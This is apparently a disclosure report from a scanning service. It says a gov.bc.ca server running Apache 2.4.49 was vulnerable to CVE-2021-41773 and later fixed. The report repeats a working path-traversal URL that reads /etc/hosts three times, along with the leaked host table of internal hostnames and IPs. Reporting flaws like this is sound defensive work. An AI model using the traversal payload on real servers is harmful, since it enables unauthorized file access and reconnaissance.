- Creation
- Validation
- Communication & fix
- Disclosure
gov.bc.ca / Apache 2.4.49 vulnerable to CVE-2021-41773
Deleted user
reported 2021-10-17
Your server was found vulnerable to CVE-2021-41773.
Attackers can read any file from your server.
Under some circumstances attackers are able to execute code on your server.
IP:
142.34.249.81Port:
443Detected protocol:
httpsVulnerable URL:
https://edr.vs.gov.bc.ca/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostsFound host file trough Apache traversal:
#
# internet host table
# created by solaris11-build-network 20190719:150139
#
::1 localhost
127.0.0.1 localhost
142.34.249.75 visum.dmz visum loghost
172.31.17.75 visum-m visum-m.hs.advsol.tech
172.31.16.75 visum-b
206.120.21.156 oracle-oem-oc-mgmt-roo
# virtual hosts
142.34.249.80 ebr.vs.gov.bc.ca
142.34.249.81 edr.vs.gov.bc.ca
142.34.249.82 emli.vs.gov.bc.ca
142.34.249.83 evss.vs.gov.bc.ca
142.34.249.84 ecos.vs.gov.bc.ca
142.34.249.86 vspay.vs.gov.bc.ca
142.34.249.87 awstats.vs.gov.bc.ca
Found by Apache2449TraversalPlugin 2021-10-16
IP:
142.34.249.81Port:
443Detected protocol:
httpsVulnerable URL:
https://edr.vs.gov.bc.ca/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostsFound host file trough Apache traversal:
#
# internet host table
# created by solaris11-build-network 20190719:150139
#
::1 localhost
127.0.0.1 localhost
142.34.249.75 visum.dmz visum loghost
172.31.17.75 visum-m visum-m.hs.advsol.tech
172.31.16.75 visum-b
206.120.21.156 oracle-oem-oc-mgmt-roo
# virtual hosts
142.34.249.80 ebr.vs.gov.bc.ca
142.34.249.81 edr.vs.gov.bc.ca
142.34.249.82 emli.vs.gov.bc.ca
142.34.249.83 evss.vs.gov.bc.ca
142.34.249.84 ecos.vs.gov.bc.ca
142.34.249.86 vspay.vs.gov.bc.ca
142.34.249.87 awstats.vs.gov.bc.ca
Found by Apache2449TraversalPlugin 2022-01-05
IP:
142.34.249.81Port:
443Detected protocol:
httpsVulnerable URL:
https://edr.vs.gov.bc.ca/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostsFound host file trough Apache traversal:
#
# internet host table
# created by solaris11-build-network 20190719:150139
#
::1 localhost
127.0.0.1 localhost
142.34.249.75 visum.dmz visum loghost
172.31.17.75 visum-m visum-m.hs.advsol.tech
172.31.16.75 visum-b
206.120.21.156 oracle-oem-oc-mgmt-roo
# virtual hosts
142.34.249.80 ebr.vs.gov.bc.ca
142.34.249.81 edr.vs.gov.bc.ca
142.34.249.82 emli.vs.gov.bc.ca
142.34.249.83 evss.vs.gov.bc.ca
142.34.249.84 ecos.vs.gov.bc.ca
142.34.249.86 vspay.vs.gov.bc.ca
142.34.249.87 awstats.vs.gov.bc.ca
Found by Apache2449TraversalPlugin 2022-01-06
Report created by
deleted-user
2021-10-17
deleted-user
2021-10-17
Report approved by
BloodyShell
2021-10-18
BloodyShell
2021-10-18
New PDF report generated by system 2021-10-18
Report dispatched to ...@... by system 2021-10-18
Report dispatched to ...@... by system 2021-10-18
Report dispatched to ...@... by system 2021-10-18
Report edited by
BloodyShell
2021-10-31
BloodyShell
2021-10-31
New PDF report generated by system 2021-10-31
Report dispatched to ...@... by system 2021-10-31
system
commented 2022-02-08:
approved
shows in report
bip! I'm a LeakIX probe. This issue looks like it has been resolved!
New PDF report generated by system 2022-02-08
Report comment dispatched to zythop by system 2022-02-08
Report comment dispatched to Privacy.Helpline@gov.bc.ca by system 2022-02-08
Report comment dispatched to contact@gov.bc.ca by system 2022-02-08
Report comment dispatched to info@gov.bc.ca by system 2022-02-08
Report comment dispatched to contact@cyber.gc.ca by system 2022-02-08
Report marked as fixed by
deleted-user
2022-02-08
deleted-user
2022-02-08
Report closed by
deleted-user
2022-02-08
deleted-user
2022-02-08
New PDF report generated by system 2022-02-08
Report edited by
deleted-user
2022-02-08
deleted-user
2022-02-08
New PDF report generated by system 2022-02-08
Information
Owner
gov.bc.ca
Created
2021-10-17 08:18
Updated
2022-02-08 16:29
Fixed
true
Contacts
P...@gov.bc.ca
c...@gov.bc.ca
i...@gov.bc.ca
c...@cyber.gc.ca
Status
Status
closed
Hosting contacted
false
CERT contacted
false
Download report